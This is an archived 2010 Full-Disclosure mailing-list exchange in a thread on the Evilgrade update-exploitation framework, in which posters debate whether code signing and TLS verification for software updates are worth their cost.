Valdis, I've read all of your postings on this thread and I just don't buy what you're saying. Except if a signing key gets compromised, as happened to one Linux vendor recently, causing a lot of kerfluffle... Setting up a proper signing system involves a certain amount of actual cost and effort. And every organization that produces code, be it for-profit proprietary code or free open-source code, has to make resource tradeoffs. Having a signing key that is poorly protected at the vendor's offices is still better than not signing any updates. Is there any actual *evidence* that hijacking authorized updates is a big enough problem to be worth it? If each year, 5 of their customers get pwned by the sort of attack that Evilgrade does, but 50,000 get pwned by click here popups that code signing won't do squat to prevent, is it really worth their time and effort? Sure, sucks to be one of the 5, but if they instead spend the resources to do something *else* to make their customer's lives better that would benefit thousands rather than the 5 It *really* doesn't take that much effort to enforce SSL/TLS certificate verification in the automated update process. You don't need to do anything special with code signing. Just check for updates via HTTPS URLs and require that verification checks out. tim ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back
On Sun, 31 Oct 2010 17:07:06 BST, [lesh] Ivan Nikolic said: Christian, Vladis, are you the same person? Nope, as far as I know... what are your motives? Can't speak for Christian, I'm just here trying to counterbalance all the ZOMG it needs to be More Secure - quite often that's a knee-jerk response that hasn't been very well thought out.. do you really believe the things you are saying? Yes, I believe that security is about trade-offs, and that often security measures end up costing more to implement than they're actually worth. It's one thing to wave your hands and cook up a security scheme that *sounds* good - it's another entirely to look at it with 30 years of experience of what's actually *deployable*. you seem to be just generally negative, jumping from point to point and being very silly. Devil's Advocate - a dirty job, but somebody has to do it. It's been said that if you can't come up with 3 or 4 major flaws in a proposal you make, you haven't thought it through enough. Since a lot of people here don't seem to do it for themselves, somebody else has to. pgp1Hi83BVLtR.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
